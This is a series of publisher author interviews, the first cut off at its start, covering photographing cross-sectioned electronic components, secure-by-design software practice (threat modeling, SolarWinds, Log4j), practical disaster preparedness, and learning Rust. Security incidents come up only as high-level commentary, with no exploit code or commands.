WO: At one point we realized that we would have to cull the weakest subjects from our draft. We ended up deleting about a dozen—some quite interesting and beautiful—along with their descriptive text. The book is stronger as a whole because we did so, but it really stung at the time. Fine-tuning our text was also difficult in places. For a number of subjects, we only had a few sentences in which to flesh out subtle concepts clearly, to an audience composed of both laypeople and engineers.


NSP: How did you divide up all of the labor that the book entailed? I mean, you had to find hundreds of tiny electronic components, carefully cut them in half, photograph them, write the accompanying text for each page—the list goes on and on!

ES: Windell took on the photography and some of the sample preparation, introducing me to some more professional tools that I hadn’t used before. We spent time searching the local electronics surplus store for potential subjects, and I made a lot of exploratory cuts to see if a particular component would be good enough for the book. I’d say the writing was a 50/50 split—we spent so much time writing and editing over video-chat that I wouldn’t be able to point to any sentence and definitively say 'I wrote this.'

WO: In addition to the bulk of the cutting and sample preparation, Eric also drew the rough drafts of all of the illustrations and wrote the initial drafts of some of the most challenging subjects to describe. I took the photographs, fine-tuned the illustrations, and designed the initial page layout so that we could understand how much text could be paired with each photographic subject. And as Eric said, we worked together closely through all of the writing and editorial choices.


NSP: Eric—what was the hardest thing to cross-section, and how did you eventually make it work?

ES: The most challenging was the cathode ray tube (page 186). Windell had the idea to cut it on the slow-speed saw so we could remove the electron gun. I sectioned the glass envelope and the electron gun separately—each of those took several hours to wet sand. The parts were simply too fragile to section any other way. Cleaning the sectioned electron gun was difficult because of the small magnet inside, which vacuumed up the debris created during sanding.


NSP: Windell—unlike a cross-section illustration, capturing everything inside an object with a single photograph in a single frame had to be difficult at times. Can you give us some examples where you had to get creative to get the shot?

WO: One of the basic limitations that you can run into with macro photography is the limited depth of field—only a very narrow slice of the view is in focus at any given time. We used focus-stacking software to digitally combine pictures taken at different camera positions, stitching them together like a panorama where the entire subject is sharp and in focus. The circuit-board photograph on the front cover of the book was taken this way. Other times, the subject itself can just be plain hard to photograph.

For some of the LEDs, like the surface-mount LED on page 90, we took photos at different exposure levels and composited them (in a basic HDR—high dynamic range—process) so that you can see detail even in the brightly lit LED. For the color sensor on page 81, the photos came out drab until we added an additional light source at just the right position and brightness so that you could see the additional reflection.


NSP: How did you decide what samples and images ultimately made it into the book?

ES: During endless hours of video chat we discussed every potential sample and made a highly detailed spreadsheet. We’re both very organized.

WO: Some part of it was determined by which things we could get our hands on—there are probably 50 other things in the spreadsheet that we might have included if we had an example to disassemble. We did skip a number of potential subjects that were too similar to others, too difficult to section, too difficult to photograph, or that were less likely to be of general interest.


NSP: Anyone who’s into photography knows that what’s pleasing to the eye is not always pleasing to the lens. Were there any samples that you successfully cross-sectioned but just could not get a good photo of—things you left on the cutting-room floor, as it were?

WO: Yes, there were quite a few actually, including some that we put a lot of time into preparing. A good example is a reed relay, where we just couldn’t get a photo that clearly showed the features that we wanted to highlight.


NSP: Given that you both have backgrounds in hardware engineering—and professional tinkering in general—did you know in advance which electronic components would look cool from a cross-cutting perspective, or was there a lot of trial and error? Any surprises along the way, good or bad?

ES: I’ve seen a few component cross sections created for failure-analysis purposes, so I knew about certain components that would look good, but there were definitely a few surprises. We thought an RGB LED would look cool, but after cutting into one, it just didn’t really seem interesting. We took apart a boring-looking gray electronics module that turned out to be a fabulously complex jewel—the isolation amplifier (page 266).

WO: One of my favorites that took some experimentation was the multilayer ceramic capacitor (page 36). There’s never been any mystery about what is in one—stacked layers of metal electrodes—but it took us a lot of experimentation and cutting into different capacitors to find one where you could literally see and count the individual layers. There were definitely real surprises along the way. The way that the rocker DIP switch (page 110) works inside is just stunning elegance.


NSP: You include a “Retro Tech” section in the book for your vintage finds, like Nixie tubes, a mercury tilt switch, and even a magnetic tape head. From a purely aesthetic standpoint, which era wins (Old vs. Modern) as far as microscale interior design goes?

ES: They both fascinate me. Vintage components seem warm and natural to me, being made of less processed materials like brass, rubber, mica, and glass. Modern parts have a sort of cold Cartesian precision and a microscopic intricacy.

WO: Modern electronics has so much more to offer in interior design—there’s just so much more inside. If we were talking about exterior design, I’ll pick the vintage. I love all the brass and Bakelite.


NSP: Windell, your company’s motto is “Making the World a Better Place, One Evil Mad Scientist at a Time.” If you had to come up with a similar motto for your book, what would it be? I’ll go first: “Making the garage a messier place, one experiment at a time!” . . . I guess what I’m getting at is, what effect do you hope your work in this book has on people? Eric, same question for you.

WO: If the book needed a motto, other than our existing subtitle, I’d pick “Showing you the Hidden Wonders Inside Electronics.” I hope that it inspires people to open up their electronics and look inside. To look at the parts for the little clues about how they’re made, what they’re for, and how they work. To appreciate elegant design, where they weren’t looking for it before.

ES: I want to inflame curiosity. Earlier today my very young nephew was totally absorbed in a copy of the book, asking his mother afterwards if they had any circuits he could play with. The world is a better place with curious people living in it.


Redesigning Security with Living-Legend Loren Kohnfelder

This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.

DesigningSecureSoftware coverLoren Kohnfelder

Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security-experts.

No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service and Elevation of privileges), and you helped bake security-design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we now have pervasive internet connectivity, exponential growth in compute power and storage, cloud computing, and software itself is vastly more complex. All of these changes have grown the attack surface—plus our greater reliance on digital systems, as well as the massive amounts of data in the world, serve to increase motivation for attackers. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover the only threats software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that directly act in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.


NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.


NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more facile at the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned for identifying these potential vulnerabilities.


NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, that are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures, and also ensure that it's the latest version available, before trusting any code, and of course promptly install future updates that fix critical issues.


NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)


NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of just these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and API are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for API, which can fail to anticipate evolving threats that, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationship and security responsibility. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for the API documentation to provide clear security commitments, or detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—that they may not even have been aware of—offered attackers an attractive point of entry.


NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a Perfect Storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than strings with escape sequences that got Log4j into trouble.

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of material (that would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that’d help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.


The End Is (Not) Nigh: Disaster Prepping with Michal Zalewski

For our first Author Spotlight interview of 2022, we have illustrious guest Michal Zalewski—world-class security researcher and author of the newly released Practical Doomsday: A User’s Guide to the End of the World. In the following Q&A, we talk with him about taking disaster preparedness back from the fringe, what he's learned from living through numerous calamities, the reason hackers have the edge over doomsday preppers in any real emergency, and why he’s got a solid backup plan “if this whole computer thing turns out to be a passing fad.”

Practical Doomsday cover Michal Zalewski avatar

Michal Zalewski (aka lcamtuf) has been the VP of Security & Privacy Engineering at Snap Inc. since 2018, following an 11-year stint at Google, where he built the product security program and helped set up a seminal bug bounty initiative. Originally hailing from Poland, he kick-started his career with frequent BugTraq posts in the ’90s, and went on to identify and publish research on hundreds of notable security flaws in the browsers and software powering our modern internet. In addition to his influence on the tech industry, Zalewski's known as the developer of the American Fuzzy Lop open-source fuzzer and other tools. He's also the author of two classic security books via No Starch Press, The Tangled Web (2011) and Silence on the Wire (2005), and is a recipient of the prestigious Lifetime Achievement Pwnie Award.

NSP: Gratulacje on your new book, Michal! Suffice it to say, a practical prep guide for doomsday scenarios could not be more timely (...all things considered). You even joke on Twitter that the past few years were an elaborate viral marketing campaign for the book’s release. But in fact, you’ve been writing on this subject since at least 2015. What first lured you into the disaster-preparedness genre?

Michal Zalewski: I keep asking myself the same question! For one, I simply grew up at an interesting time and in an interesting place: in a failed Soviet satellite state going through a period of profound political and economic strife. As a child, I didn’t think of it much, but as an adult, I look at my early years with a degree of terror and awe.

I also have this geeky curiosity about how complex systems work and how they might fail—and to be frank, I can’t quite grasp why we look at this problem so differently in the physical world versus the digital realm. After all, it’s normal to back up our files or use antivirus software; why is it wacky to buy fire extinguishers for one’s home or store several gallons of water and some canned food?

In my mind, risk modeling and common-sense preparations shouldn’t be a political issue and shouldn’t be the domain of people who are convinced that the end is nigh. If anything, having a backup plan is a wonderful way to dispel some of the worries and anxieties of everyday life.

NSP: Your personal bio illustrates one of the key points in the book—that disasters are not rare. In addition to growing up in Poland in the '80s, the book also brings up the experience of living through 9/11, the dot-com crash, and the housing crisis of 2008. Would you explain that larger theme within the context of your own trials and tribulations?

MZ: Oh, I don’t want to oversell my life story! My experiences are shared by tens of millions of people around the globe. Countless others have lived through much worse— famine, devastating natural disasters, wars.

I’m going to say one thing, though. Living through a sufficient number of calamities reveals a simple truth: that every generation gets to experience their own “winter of the century,” “recession of the century,” “pandemic of the century,” and so on. And every time, such events catch them off guard.

In most cases, it’s not a matter of life and death; most people make it through recessions, wildfires, and floods. But having a robust plan can make the situation much less stressful, and can make the recovery more certain and more swift.

NSP: Most people picture doomsday preppers as ex-military survivalist-types—not a self-described “city-raised computer nerd.” How has your hacker background informed the emergency-preparedness thought process you’re teaching readers in the book?

MZ: If there’s one obvious difference, it’s that in the physical realm, life-threatening incidents are fairly rare. In the world of computing, on the other hand, networks and applications are under constant attack. When you work in this domain, I think you start to appreciate the saying attributed to Mike Tyson: “everyone has a plan until they get punched in the mouth”— that is, theory seldom survives the clash with reality. By the end of the day, the surest way to get through an emergency is to be adaptable and resilient, not to have an impressive stockpile guns and bushcraft tools.

Another principle I picked up from the world of information security is that there is no limit to how much time, effort, and money you can spend in the pursuit of perfection—but perfection is not necessarily a useful goal. A good preparedness strategy needs to zero in on problems that are important, plausible, and can be addressed in a cost-effective way, without jeopardizing your quality of life should the apocalypse not come.

NSP: As a teenager, you became active in Europe’s fledgling infosec community, which led to consulting projects, pentesting gigs and, eventually, a remarkable career in the industry. Based on your own success, what do you think it takes to truly succeed in the infosec field and/or what’s your best career advice for aspiring security researchers?

MZ: I try to be careful with career advice—sometimes, people are successful despite their habits, not because of them. That said, I certainly found it helpful to always approach security in a bottom-up fashion. If you make the effort to understand how the underlying technologies really work, their failure modes become fairly self-evident too.

My best advice for aspiring professionals is different, though: perhaps the most underrated skill in tech are solid writing skills. That’s because technical prowess is not sufficient to succeed—you need to get others on board. I have a short Twitter thread with a handful of tips here.

NSP: In addition to your street cred in the security world, you’re credited with (inadvertently) helping hackerdom in another realm entirely—Hollywood. The Matrix Reloaded is lauded as the first major motion picture to accurately portray a hack. More specifically, your hack. For those who haven’t seen it, Trinity uses an Nmap port scan, followed by an SSH exploit to break into a power company and disable the city’s electric grid. In 2001, you discovered the SSH bug being depicted on screen. Can you tell us anything about your vulnerability report being in one of the movie’s most pivotal scenes?

MZ: I wish I had a cool story to tell! I was surprised (and flattered) to see my bug on the big screen. My other cinematic claim to fame is having my fuzzer—American Fuzzy Lop—surface in the TV series Mr. Robot.

Of course, my screen credits pale in comparison with the track record of the aforementioned NMap tool. The network scanner makes an appearance in at least a dozen films and TV series, reportedly including at least one porn flick.

NSP: In an example of life imitating art, the intelligence community has recently sounded the alarm over an “unprecedented” uptick in hackers targeting electric grids. Maybe if the fictional power company in The Matrix Reloaded had someone like you working for them, Trinity’s blackout-inducing exploit would have failed—which begs the question: do you think white-hat hackers could be the answer to the risk that APTs pose to critical infrastructure? Is it as simple as utility providers adopting bug-bounty bounty programs, such as the one your team launched at Google a decade ago?

MZ: Bug bounties are a cherry on top for a mature security program: they are a last-resort mechanism to catch a fraction of mistakes that slip past your internal defenses. But if you’re routinely letting vulnerabilities ship to production and then hope that talented strangers will catch them all, you’re playing a very dangerous game.

A comprehensive security program starts with minimizing the risk of such mistakes in the first place: building automation that makes it easy to do the right thing and difficult for humans to mess up. The second layer of defense are internal processes for vetting the design and implementation of your systems, and for penetration-testing or fuzzing the products before they go out the door.

Still, the problem faced by most utilities isn’t related to any of this: it’s that we have a fairly small pool of infosec talent and that companies are fiercely competing for that talent. The Wyoming Rural Electric Association doesn’t have it easy when even the most junior security engineer can land an interview with Amazon, Goldman Sachs, or SpaceX.

NSP: From your early years posting software vulnerabilities on BugTraq, to your research exposing the flawed security models of web browsers, to helping Google build its massive product security program, you've become known as one of the most influential people in infosec. Over the same decades, the internet has gone from a place of dial-up connections and friendly message-boards to a global network that governs nearly every aspect of digital society. Given your unique vantage point in this regard, what do you think is the most pressing challenge in the industry today?

MZ: I'm not an infosec malcontent—I think our industry has made impressive progress when it comes to reasoning about and reducing the risk of most types of security flaws. But as you note, the stakes are getting higher too: nowadays, almost everything is connected to the internet, and even the humble thermostat on your wall might be running more than ten millions lines of code. This makes absolute security a rather challenging goal.

In light of this, the two keywords that come to mind are "compartmentalization" and "containment." You have to plan for unavoidable mishaps and must have a way to prevent them from turning into disasters. For enterprises, this may involve dividing systems into smaller, well-understood blocks that can be cordoned off and monitored for anomalies with ease. The technologies and the architecture paradigms that make this possible are still in their infancy, but I think they hold a lot of promise.

Of course, we can practice compartmentalization and containment in everyday life, too. Perhaps only so much in your life should depend on the security of a single email provider or a single bank.

NSP: Last question! One of the prepper commandments in your book is, simply, “Learn new skills.” Why is this important for building a comprehensive disaster-preparedness plan, and what are some useful secondary skills that you have developed outside of infosec?

MZ: The point I make in the book is that the accelerating pace of technological change means that fewer and fewer jobs are for life. You know, in the 1990s, opening a VHS rental place or a music store was a sound business plan, journalism was a revered and well-paying gig, and the photographic film industry was a behemoth that consumed about a third of the global silver supply. We are probably going to see similar shifts in the coming decades. In particular, I’m not at all convinced that software engineers are still going to be an elite profession in 20-30 years.

It’s hard to predict the future, but it’s possible to hedge our bets—say, by pursuing potentially marketable hobbies on the side. Even if nothing happens, such pursuits are still rewarding on their own. I enjoy woodworking and tinkering with electronics. I could probably turn these hobbies into gainful employment if this whole computer thing turns out to be a passing fad.

*Use coupon code SPOTLIGHT30 to get 30% off your order of Practical Doomsday through March 9, 2022.

Live Coder Jon Gjengset Gets into the Nitty-Gritty of Rust

Our always fascinating Author Spotlight series continues with Jon Gjengset – author of Rust for Rustaceans. In the following Q&A, we talk with him about what it means to be an intermediate programmer (and when, exactly, you become a Rustacean), how Rust “gives you the hangover first” for your code's own good, why getting over a language's learning curve sure beats reactive development, and how new users can help move the needle toward a better Rust.

Rust for Rustaceans cover Jon Gjengset headshot

A former PhD student in the Parallel and Distributed Operating Systems group at MIT CSAIL, Gjengset is a senior software engineer at Amazon Web Services (AWS), with a background in distributed systems research, web development, system security, and computer networks. At Amazon, his focus is on driving adoption of Rust internally, including building out internal infrastructure as well as interacting with the Rust ecosystem and community. Outside of the 9-to-5, he conducts live coding sessions on YouTube, is working on research related to a new database engine written in Rust, and shares his open-source projects on GitHub and Twitter.

No Starch Press: Congratulations on your new book! Everyone digs the title, Rust for Rustaceans – which is a tad more fitting than its original moniker, Intermediate Rust. I only bring this up because both names speak to who the book is for. Let’s talk about that. What does “intermediate'' mean to you in terms of using Rust? Specifically, what gap does your book fill for those who may have finished The Rust Programming Language, and are now revving to become *real* Rustaceans?

Jon Gjengset: Thank you! Yeah, I’m pretty happy with the title we went with, because as you’re getting at, the term “intermediate” is not exactly well-defined. In my mind, intermediate encapsulates all of the material that you wouldn’t need to know or feel comfortable digging into as a beginner to the language, but not so advanced that you’ll rarely run into it when you get to writing Rust code in the wild. Or, to phrase it differently, intermediate to me is the union of all the stuff that engineers working with Rust in real situations would pick up and find continuously useful after they’ve read The Rust Programming Language.

I also want to stress that the book is specifically not titled "The Path to Becoming a Rustacean," or anything along those lines. It’s not as though you’re not a real Rustacean until you’ve read this book, or that the knowledge the book contains is something every Rustacean knows. Quite the contrary – in my mind, you are a Rustacean from just before the first time you ask yourself whether you might be one, and it’s at that point you should consider picking up this book, whenever that may be. And for most people, I would imagine that point comes somewhere around two thirds through The Rust Programming Language, assuming you’re trying to actually use the language on the side.

NSP: Rust has been voted “the most loved language” on Stack Overflow for six years running. That said, it's also gained a reputation for being harder to learn than other popular languages. What do you tell developers who are competent in, say, Python but hesitant to try Rust because of the perceived learning curve?

JG: Rust is, without a doubt, a more difficult language to learn compared to its various siblings and cousins, especially if you’re coming from a different language that’s not as strict as Rust is. That said, I think it’s not so much Rust that’s hard to learn as it is the principles that Rust forces you to apply to your code. If you’re writing code in Python, to use your example, there are a whole host of problems the language lets you get away with not thinking about – that is, until they come back to bite you later. Whether that comes in the form of bugs due to dynamic typing, concurrency issues that only crop up during heavy load, or performance issues due to lack of careful memory management, you’re doing reactive development. You build something that kind of works first, and then go round and round fixing issues as you discover them.

Rust is different because it forces you to be more proactive. An apt quote from RustConf this year was that Rust “gives you the hangover first” – as a developer you’re forced to make explicit decisions about your program’s runtime behavior, and you’re forced to ensure that fairly large classes of bugs do not exist in your program, all before the compiler will accept your source code as valid. And that’s something developers need to learn, along with the associated skill of debugging at compile time as opposed to at runtime, as they do in other languages.

It’s that change to the development process that causes much of (though not all of) Rust’s steeper learning curve. And it’s a very real and non-trivial lesson to learn. I also suspect it’ll be a hugely valuable lesson going forward, with the industry’s increased focus on guaranteed correctness through things like formal verification, which only pushes the developer experience further in this direction. Not to mention that the lessons you pick up often translate back into other languages. When I now write code in Java, for instance, I am much more cognizant of the correctness and performance implications of that code because Rust has, in a sense, taught me how to reason better about those aspects of code.

NSP: In the initial 2015 release announcement, Rust creator Graydon Hoare called it “technology from the past come to save the future from itself.” More recently, Rust evangelist Carol Nichols described it as “trying to learn from the mistakes of C, and move the industry forward.” To give everyone some context for these sentiments, tell us what sets Rust apart safety-wise from “past” systems languages – in particular, C and C++ – when it comes to things like memory and ownership.

JG: I think Rust provides two main benefits over C and C++ in particular: ergonomics and safety. For ergonomics, Rust adopted a number of mechanisms traditionally associated with higher-level languages that make it easier to write concise, flexible, (mostly) easy-to-read, and hard-to-misuse code and interfaces – mechanisms like algebraic data types, pattern matching, fairly powerful generics, and first-class functions. These in turn make writing Rust feel less like what often comes to mind when we think about system programming – low-level code dealing just with raw pointers and bytes – and makes the language more approachable to more developers.

As for safety, Rust encodes more information about the semantics of code, access, and data in the type system, which allows it to be checked for correctness at compile-time. Properties like thread safety and exclusive mutability are enforced at the type-level in Rust, and the compiler simply won’t let you get them wrong. Rust’s strong type system also allows APIs to be designed to be misuse-resistent through typestate programming, which is very hard to pull off in less strict languages like C.

Rust’s choice to have an explicit break-the-glass mechanism in the form of the unsafe keyword also makes a big difference, because it allows the majority of the language to be guaranteed-safe while also allowing low-level bits to stay within the same language. This avoids the trap of, say, performance-sensitive Python programs where you have to drop to C for low-level bits, meaning you now need to be an expert in two programming languages! Not to mention that unsafe code serves as a natural audit trail for security reviews!

NSP: Along those same lines, Rust (like Go and Java) prevents programmers from introducing a variety of memory bugs into their code. This got the attention of the Internet Security Research Group, whose latest project, Prossimo, is endeavoring to replace basic internet programs written in C with memory-safe versions in Rust. Microsoft has also been very vocal about their adoption of Rust, and Google is backing a project bringing Rust to the Linux kernel underlying Android. As Rust is increasingly embraced and used for bigger and bigger projects, are there any niche or large-scale applications, or certain technology combos you’re most excited about?

JG: Putting aside the discussion about whether Rust prevents the same kinds of bugs in the same kinds of ways as languages like Go and Java, it’s definitely true that the move to these languages represent a significant boost to memory safety. And I think Rust in particular unlocked another segment of applications that would previously have been hard to port, such as those that would struggle to operate with a language runtime or automated garbage collection.

For me, some of the most exciting trajectories for Rust lie in its interoperability with other systems and languages, such as making Rust run on the web platform through WASM, providing a better performance-fallback for dynamic languages like Ruby or Python, and allowing component-by-component rewrites in established existing systems like cURL, Firefox, and Tor. The potential for adoption of Rust in the kernel is also very much up there if it might make kernel development more approachable than it currently is – kernel C programming can be very scary indeed, which means fewer contributors dare try.

NSP: In the book’s foreword, David Tolnay – a prolific contributor to the language, who served as your technical reviewer – says that he wants readers to “be free to think that we got something wrong in this book; that the best current guidance in here is missing something, and that you can accomplish something over the next couple years that is better than what anybody else has envisioned. That’s how Rust and its ecosystem have gotten to this point.” The community-driven development process he’s referencing is somewhat unique to Rust and its evolution. Could you briefly explain how that works?

JG: I’m very happy that David included that in his foreword, because it resonates strongly with me coming from a background in academia. The way we make progress is by constantly seeking to find new and better solutions, and questioning preconceived notions of what is and isn’t possible, or how things “should” be done. And I think that’s part of how Rust has managed to address as many pain points as it does. The well-known Rust adage of “fast, reliable, productive, pick three” is, in some sense, an embodiment of this sentiment – let’s not accept the traditional wisdom that this is a fundamental trade-off, and instead put in a lot of work and see if there’s a better way.

In terms of how it works in practice, my take is that you should always seek to understand why things are the way they are. Why is this API structured this way? Why doesn’t this type implement Send? Why is static required here? Why does the standard library not include random number generation? Often you’ll find that there is a solid and perhaps fundamental underlying reason, but other times you may just end up with more questions. You might find an argument that seems squishy and soft, and as you start poking at it you realize that maybe it isn’t true anymore. Maybe the technology has improved. Maybe new algorithms have been developed. Maybe it was based on a faulty assumption to begin with. Whatever it may be, the idea is to keep pulling at those threads in the hope that at the other end lies some insight that allows you to make something better.

